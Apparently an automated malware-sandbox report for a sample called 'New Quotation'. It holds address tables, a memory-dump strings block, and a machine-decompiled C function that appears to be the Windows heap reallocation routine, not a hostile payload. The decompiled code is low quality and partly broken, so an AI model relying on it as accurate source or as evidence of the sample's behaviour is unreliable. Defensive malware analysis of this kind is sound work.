                                                                                                                                                                                          0x1d852531
                                                                                                                                                                                          0x1d85253a
                                                                                                                                                                                          0x1d85253c
                                                                                                                                                                                          0x1d852542
                                                                                                                                                                                          0x1d852511
                                                                                                                                                                                          0x1d852511
                                                                                                                                                                                          0x1d852511
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85250f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d852445
                                                                                                                                                                                          0x1d852448
                                                                                                                                                                                          0x1d8524ef
                                                                                                                                                                                          0x1d85244e
                                                                                                                                                                                          0x1d85244e
                                                                                                                                                                                          0x1d852455
                                                                                                                                                                                          0x1d852455
                                                                                                                                                                                          0x1d852574
                                                                                                                                                                                          0x1d852574
                                                                                                                                                                                          0x1d85257a
                                                                                                                                                                                          0x1d852588
                                                                                                                                                                                          0x1d85258d
                                                                                                                                                                                          0x1d85258d
                                                                                                                                                                                          0x1d852591
                                                                                                                                                                                          0x1d852593
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d852595
                                                                                                                                                                                          0x1d852595
                                                                                                                                                                                          0x1d85259c
                                                                                                                                                                                          0x1d8525a8
                                                                                                                                                                                          0x1d8525a8
                                                                                                                                                                                          0x1d8525b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8525b9
                                                                                                                                                                                          0x1d8525c0
                                                                                                                                                                                          0x1d8525c2
                                                                                                                                                                                          0x1d8525c2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8525c0
                                                                                                                                                                                          0x1d8525b7
                                                                                                                                                                                          0x1d852593
                                                                                                                                                                                          0x1d85243f
                                                                                                                                                                                          0x1d85242b
                                                                                                                                                                                          0x1d85241d
                                                                                                                                                                                          0x1d852239
                                                                                                                                                                                          0x1d85223a
                                                                                                                                                                                          0x1d85223f
                                                                                                                                                                                          0x1d852248
                                                                                                                                                                                          0x1d852249
                                                                                                                                                                                          0x1d85224f
                                                                                                                                                                                          0x1d852250
                                                                                                                                                                                          0x1d852256
                                                                                                                                                                                          0x1d85225a
                                                                                                                                                                                          0x1d85229b
                                                                                                                                                                                          0x1d8522a1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8522a7
                                                                                                                                                                                          0x1d8522a7
                                                                                                                                                                                          0x1d8522a7
                                                                                                                                                                                          0x1d8522b1
                                                                                                                                                                                          0x1d8522b4
                                                                                                                                                                                          0x1d8522b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8522bc
                                                                                                                                                                                          0x1d8522cc
                                                                                                                                                                                          0x1d8522d1
                                                                                                                                                                                          0x1d8522d5
                                                                                                                                                                                          0x1d8522d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8522dd
                                                                                                                                                                                          0x1d8522e1
                                                                                                                                                                                          0x1d8522e5
                                                                                                                                                                                          0x1d8522e6
                                                                                                                                                                                          0x1d8522e7
                                                                                                                                                                                          0x1d8522e8
                                                                                                                                                                                          0x1d8522ee
                                                                                                                                                                                          0x1d8522f0
                                                                                                                                                                                          0x1d8522f1
                                                                                                                                                                                          0x1d8522f7
                                                                                                                                                                                          0x1d8522f9
                                                                                                                                                                                          0x1d8522fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d852301
                                                                                                                                                                                          0x1d852307
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85230d
                                                                                                                                                                                          0x1d85231b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85231b
                                                                                                                                                                                          0x1d852307
                                                                                                                                                                                          0x1d85245f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85225c
                                                                                                                                                                                          0x1d85225e
                                                                                                                                                                                          0x1d852262
                                                                                                                                                                                          0x1d852262
                                                                                                                                                                                          0x1d852268
                                                                                                                                                                                          0x1d85237e
                                                                                                                                                                                          0x1d852380
                                                                                                                                                                                          0x1d852381
                                                                                                                                                                                          0x1d852383
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d852385
                                                                                                                                                                                          0x1d852388
                                                                                                                                                                                          0x1d85238c
                                                                                                                                                                                          0x1d85238f
                                                                                                                                                                                          0x1d8523a7
                                                                                                                                                                                          0x1d852391
                                                                                                                                                                                          0x1d852394
                                                                                                                                                                                          0x1d85239d
                                                                                                                                                                                          0x1d8523a2
                                                                                                                                                                                          0x1d8523a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85238f
                                                                                                                                                                                          0x1d852277
                                                                                                                                                                                          0x1d852277
                                                                                                                                                                                          0x1d852279
                                                                                                                                                                                          0x1d85227c
                                                                                                                                                                                          0x1d85232c
                                                                                                                                                                                          0x1d85232f
                                                                                                                                                                                          0x1d852336
                                                                                                                                                                                          0x1d852336
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d852336
                                                                                                                                                                                          0x1d852331
                                                                                                                                                                                          0x1d852334
                                                                                                                                                                                          0x1d852341
                                                                                                                                                                                          0x1d852343
                                                                                                                                                                                          0x1d85234c
                                                                                                                                                                                          0x1d85234f
                                                                                                                                                                                          0x1d852353
                                                                                                                                                                                          0x1d85235b
                                                                                                                                                                                          0x1d852364
                                                                                                                                                                                          0x1d85236d
                                                                                                                                                                                          0x1d85236e
                                                                                                                                                                                          0x1d852374
                                                                                                                                                                                          0x1d85237a
                                                                                                                                                                                          0x1d852345
                                                                                                                                                                                          0x1d852345
                                                                                                                                                                                          0x1d852345
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d852343
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d852282
                                                                                                                                                                                          0x1d852285
                                                                                                                                                                                          0x1d852322
                                                                                                                                                                                          0x1d85228b
                                                                                                                                                                                          0x1d85228b
                                                                                                                                                                                          0x1d852292
                                                                                                                                                                                          0x1d852292
                                                                                                                                                                                          0x1d8523ac
                                                                                                                                                                                          0x1d8523ac
                                                                                                                                                                                          0x1d8523b2
                                                                                                                                                                                          0x1d8523c0
                                                                                                                                                                                          0x1d8523c5
                                                                                                                                                                                          0x1d8523c5
                                                                                                                                                                                          0x1d8523c9
                                                                                                                                                                                          0x1d8523cb
                                                                                                                                                                                          0x1d8523d3
                                                                                                                                                                                          0x1d8523db
                                                                                                                                                                                          0x1d8523db
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8523cb
                                                                                                                                                                                          0x1d85227c
                                                                                                                                                                                          0x1d852268
                                                                                                                                                                                          0x1d85225a

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                          • API String ID: 0-2160512332
                                                                                                                                                                                          • Opcode ID: 4dc41cc832f160185694e0fbb7bf4a8aabfa6794e40dfddaca6baac9699dcfb7
                                                                                                                                                                                          • Instruction ID: e7ccc6b1f059d6a511ac9fa2d0217c42ff0d53411c410abf0e26340fee3bf487
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dc41cc832f160185694e0fbb7bf4a8aabfa6794e40dfddaca6baac9699dcfb7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D924A75608346AFD721CF24C8C0BAAB7E9BF84754F05492DFA959B260DB70E844CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D87FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E1D87FDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				intOrPtr _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x1d8ad430);
				E1D827BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E1D7C7662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E1D8802E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E1D7CB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E1D7DFED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					E1D880835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E1D7C753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x1d8c47c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x1d8c47cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8c47ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E1D7CB910();
							} else {
								E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E1D87823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E1D7CB910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x1d8c47a1 = 1;
								 *0x1d8c4100 = 0;
								asm("int3");
								 *0x1d8c47a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1D7CB910("Just reallocated block at %p to %Ix bytes\n",  *0x1d8c47c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x1d8c47c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E1D7E2710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E1D88D646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E1D803AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E1D7FFDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E1D880D24(_t281);
								__eflags = 0;
								E1D880835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x1d8c47cc;
							if( *0x1d8c47cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E1D88D646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E1D803AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x1d8c47cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8c47ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E1D87823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E1D7CB910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x1d8c47a1 = 1;
									 *0x1d8c4100 = 0;
									asm("int3");
									 *0x1d8c47a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1D7CB910("About to reallocate block at %p to %Ix bytes\n",  *0x1d8c47c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x1d8c374c; // 0x0
					 *0x1d8c91e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}





































                                                                                                                                                                                          0x1d87fdf4
                                                                                                                                                                                          0x1d87fdf6
                                                                                                                                                                                          0x1d87fdfb
                                                                                                                                                                                          0x1d87fe02
                                                                                                                                                                                          0x1d87fe04
                                                                                                                                                                                          0x1d87fe09
                                                                                                                                                                                          0x1d87fe0c
                                                                                                                                                                                          0x1d87fe16
                                                                                                                                                                                          0x1d87fe35
                                                                                                                                                                                          0x1d87fe38
                                                                                                                                                                                          0x1d87fe46
                                                                                                                                                                                          0x1d87fe4b
                                                                                                                                                                                          0x1d87fe4d
                                                                                                                                                                                          0x1d880277
                                                                                                                                                                                          0x1d880277
                                                                                                                                                                                          0x1d88027a
                                                                                                                                                                                          0x1d88027a
                                                                                                                                                                                          0x1d8802c2
                                                                                                                                                                                          0x1d8802c9
                                                                                                                                                                                          0x1d8802ce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8802ce
                                                                                                                                                                                          0x1d87fe56
                                                                                                                                                                                          0x1d87fe58
                                                                                                                                                                                          0x1d87fe62
                                                                                                                                                                                          0x1d87fe65
                                                                                                                                                                                          0x1d87fe69
                                                                                                                                                                                          0x1d87fe72
                                                                                                                                                                                          0x1d87fe72
                                                                                                                                                                                          0x1d87fe6b
                                                                                                                                                                                          0x1d87fe6b
                                                                                                                                                                                          0x1d87fe6b
                                                                                                                                                                                          0x1d87fe81
                                                                                                                                                                                          0x1d87fe84
                                                                                                                                                                                          0x1d87fe87
                                                                                                                                                                                          0x1d87fe8a
                                                                                                                                                                                          0x1d880231
                                                                                                                                                                                          0x1d880231
                                                                                                                                                                                          0x1d880237
                                                                                                                                                                                          0x1d88023a
                                                                                                                                                                                          0x1d880259
                                                                                                                                                                                          0x1d88025e
                                                                                                                                                                                          0x1d88023c
                                                                                                                                                                                          0x1d880251
                                                                                                                                                                                          0x1d880256
                                                                                                                                                                                          0x1d880264
                                                                                                                                                                                          0x1d88026f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880274
                                                                                                                                                                                          0x1d87fe90
                                                                                                                                                                                          0x1d87fe93
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87fe9b
                                                                                                                                                                                          0x1d87fe9f
                                                                                                                                                                                          0x1d87fea2
                                                                                                                                                                                          0x1d87feaa
                                                                                                                                                                                          0x1d87feaf
                                                                                                                                                                                          0x1d87feb6
                                                                                                                                                                                          0x1d87feb6
                                                                                                                                                                                          0x1d87febb
                                                                                                                                                                                          0x1d87febb
                                                                                                                                                                                          0x1d87fec2
                                                                                                                                                                                          0x1d87fec7
                                                                                                                                                                                          0x1d87feca
                                                                                                                                                                                          0x1d87fecd
                                                                                                                                                                                          0x1d87fed1
                                                                                                                                                                                          0x1d87feda
                                                                                                                                                                                          0x1d87feda
                                                                                                                                                                                          0x1d87feda
                                                                                                                                                                                          0x1d87fedc
                                                                                                                                                                                          0x1d87fedf
                                                                                                                                                                                          0x1d87fee7
                                                                                                                                                                                          0x1d87fee9
                                                                                                                                                                                          0x1d87feee
                                                                                                                                                                                          0x1d87fef0
                                                                                                                                                                                          0x1d880122
                                                                                                                                                                                          0x1d880122
                                                                                                                                                                                          0x1d880125
                                                                                                                                                                                          0x1d880127
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88012d
                                                                                                                                                                                          0x1d880133
                                                                                                                                                                                          0x1d880139
                                                                                                                                                                                          0x1d8801a7
                                                                                                                                                                                          0x1d8801aa
                                                                                                                                                                                          0x1d8801ad
                                                                                                                                                                                          0x1d8801b2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8801bc
                                                                                                                                                                                          0x1d8801c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8801cd
                                                                                                                                                                                          0x1d8801d4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8801da
                                                                                                                                                                                          0x1d8801e0
                                                                                                                                                                                          0x1d8801e3
                                                                                                                                                                                          0x1d880202
                                                                                                                                                                                          0x1d880207
                                                                                                                                                                                          0x1d8801e5
                                                                                                                                                                                          0x1d8801fa
                                                                                                                                                                                          0x1d8801ff
                                                                                                                                                                                          0x1d880218
                                                                                                                                                                                          0x1d880219
                                                                                                                                                                                          0x1d880224
                                                                                                                                                                                          0x1d88017e
                                                                                                                                                                                          0x1d88017e
                                                                                                                                                                                          0x1d880184
                                                                                                                                                                                          0x1d880188
                                                                                                                                                                                          0x1d88018e
                                                                                                                                                                                          0x1d880195
                                                                                                                                                                                          0x1d88019b
                                                                                                                                                                                          0x1d88019c
                                                                                                                                                                                          0x1d88019c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880188
                                                                                                                                                                                          0x1d88013b
                                                                                                                                                                                          0x1d88013e
                                                                                                                                                                                          0x1d88015d
                                                                                                                                                                                          0x1d880162
                                                                                                                                                                                          0x1d880140
                                                                                                                                                                                          0x1d880155
                                                                                                                                                                                          0x1d88015a
                                                                                                                                                                                          0x1d880168
                                                                                                                                                                                          0x1d880176
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87fef6
                                                                                                                                                                                          0x1d87fef6
                                                                                                                                                                                          0x1d87fefc
                                                                                                                                                                                          0x1d87ff02
                                                                                                                                                                                          0x1d87ff70
                                                                                                                                                                                          0x1d87ff73
                                                                                                                                                                                          0x1d87ff76
                                                                                                                                                                                          0x1d87ff7b
                                                                                                                                                                                          0x1d880068
                                                                                                                                                                                          0x1d880070
                                                                                                                                                                                          0x1d880075
                                                                                                                                                                                          0x1d880078
                                                                                                                                                                                          0x1d88007a
                                                                                                                                                                                          0x1d880080
                                                                                                                                                                                          0x1d880080
                                                                                                                                                                                          0x1d880083
                                                                                                                                                                                          0x1d880087
                                                                                                                                                                                          0x1d880090
                                                                                                                                                                                          0x1d880090
                                                                                                                                                                                          0x1d880090
                                                                                                                                                                                          0x1d880092
                                                                                                                                                                                          0x1d880094
                                                                                                                                                                                          0x1d880097
                                                                                                                                                                                          0x1d88009a
                                                                                                                                                                                          0x1d88009f
                                                                                                                                                                                          0x1d8800a9
                                                                                                                                                                                          0x1d8800ac
                                                                                                                                                                                          0x1d8800ae
                                                                                                                                                                                          0x1d8800af
                                                                                                                                                                                          0x1d8800b3
                                                                                                                                                                                          0x1d8800b3
                                                                                                                                                                                          0x1d8800ac
                                                                                                                                                                                          0x1d8800b8
                                                                                                                                                                                          0x1d8800bc
                                                                                                                                                                                          0x1d8800ec
                                                                                                                                                                                          0x1d8800ef
                                                                                                                                                                                          0x1d8800f2
                                                                                                                                                                                          0x1d8800be
                                                                                                                                                                                          0x1d8800c0
                                                                                                                                                                                          0x1d8800c5
                                                                                                                                                                                          0x1d8800ca
                                                                                                                                                                                          0x1d8800d1
                                                                                                                                                                                          0x1d8800e3
                                                                                                                                                                                          0x1d8800d3
                                                                                                                                                                                          0x1d8800d4
                                                                                                                                                                                          0x1d8800d9
                                                                                                                                                                                          0x1d8800dc
                                                                                                                                                                                          0x1d8800df
                                                                                                                                                                                          0x1d8800df
                                                                                                                                                                                          0x1d8800e6
                                                                                                                                                                                          0x1d8800e6
                                                                                                                                                                                          0x1d8800f5
                                                                                                                                                                                          0x1d8800f9
                                                                                                                                                                                          0x1d8800fc
                                                                                                                                                                                          0x1d880108
                                                                                                                                                                                          0x1d88010e
                                                                                                                                                                                          0x1d88010e
                                                                                                                                                                                          0x1d88010e
                                                                                                                                                                                          0x1d8800fc
                                                                                                                                                                                          0x1d880114
                                                                                                                                                                                          0x1d880119
                                                                                                                                                                                          0x1d88011d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d88011d
                                                                                                                                                                                          0x1d87ff81
                                                                                                                                                                                          0x1d87ff88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87ff8e
                                                                                                                                                                                          0x1d87ff91
                                                                                                                                                                                          0x1d87ff94
                                                                                                                                                                                          0x1d87ff97
                                                                                                                                                                                          0x1d87ff9c
                                                                                                                                                                                          0x1d87ffa6
                                                                                                                                                                                          0x1d87ffa9
                                                                                                                                                                                          0x1d87ffab
                                                                                                                                                                                          0x1d87ffb0
                                                                                                                                                                                          0x1d87ffb5
                                                                                                                                                                                          0x1d87ffb5
                                                                                                                                                                                          0x1d87ffa9
                                                                                                                                                                                          0x1d87ffb8
                                                                                                                                                                                          0x1d87ffbc
                                                                                                                                                                                          0x1d87ffce
                                                                                                                                                                                          0x1d87ffd1
                                                                                                                                                                                          0x1d87ffd4
                                                                                                                                                                                          0x1d87ffbe
                                                                                                                                                                                          0x1d87ffc0
                                                                                                                                                                                          0x1d87ffc5
                                                                                                                                                                                          0x1d87ffc8
                                                                                                                                                                                          0x1d87ffc8
                                                                                                                                                                                          0x1d87ffd7
                                                                                                                                                                                          0x1d87ffd9
                                                                                                                                                                                          0x1d87ffdd
                                                                                                                                                                                          0x1d87ffe0
                                                                                                                                                                                          0x1d87ffea
                                                                                                                                                                                          0x1d87fff0
                                                                                                                                                                                          0x1d87fff0
                                                                                                                                                                                          0x1d87fff0
                                                                                                                                                                                          0x1d87fff2
                                                                                                                                                                                          0x1d87fff5
                                                                                                                                                                                          0x1d880065
                                                                                                                                                                                          0x1d880065
                                                                                                                                                                                          0x1d87fff7
                                                                                                                                                                                          0x1d87fff7
                                                                                                                                                                                          0x1d87fffe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880004
                                                                                                                                                                                          0x1d88000b
